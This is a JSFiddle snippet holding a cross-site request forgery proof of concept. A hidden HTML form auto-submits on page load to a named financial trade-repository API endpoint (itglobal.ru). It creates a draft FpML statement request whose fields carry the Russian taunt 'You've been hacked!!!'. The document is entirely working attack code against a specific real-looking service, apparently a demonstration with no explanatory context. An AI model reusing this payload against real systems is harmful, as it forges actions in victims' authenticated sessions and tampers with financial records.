JSFiddle - React, Tailwind, and code Playground

by Valentin Sarychev

HTML

<form action="http://repository1.itglobal.ru/lkr/api/drafts/create" method="POST">
    <input type="hidden" name="name" value="Тебя хакнули!!!">
    <input type="hidden" name="messageTypeCode" value="CM004">
    <input type="hidden" name="xml" value='<nsdext:statementRequest xmlns="http://www.fpml.org/FpML-5/recordkeeping" xmlns:nsdext="http://www.fpml.org/FpML-5/recordkeeping/nsd-ext" xmlns:fpmlext="http://www.fpml.org/FpML-5/ext" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" fpmlVersion="5-4" xsi:schemaLocation="http://www.fpml.org/FpML-5/recordkeeping fpml-recordkeeping-merged-schema.xsd http://www.fpml.org/FpML-5/recordkeeping/nsd-ext nsd-ext-merged-schema.xsd"><header><messageId messageIdScheme="http://repository.nsd.ru/coding-scheme/messageid(nsdrus)"></messageId><sentBy>VRKITGLOBAL4</sentBy><sendTo>NDC000000000</sendTo><creationTimestamp>2015-11-17T14:31:38</creationTimestamp><implementationSpecification><version>3.7</version></implementationSpecification></header><correlationId correlationIdScheme="http://repository.nsd.ru/coding-scheme/correlationId(nsdrus)"></correlationId><nsdext:statementParty href="StatementParty"/><nsdext:statementType>DEAL</nsdext:statementType><nsdext:statementPeriodFirstDate>2015-11-04</nsdext:statementPeriodFirstDate><nsdext:statementPeriodLastDate>2015-11-05</nsdext:statementPeriodLastDate><party id="StatementParty"><partyId>PARTY-1-CODE</partyId><partyId>Тебя хакнули!!!</partyId><classification>B</classification><country>AX</country><organizationType>P</organizationType></party></nsdext:statementRequest>'>
</form>

JavaScript

document.querySelector('form').submit();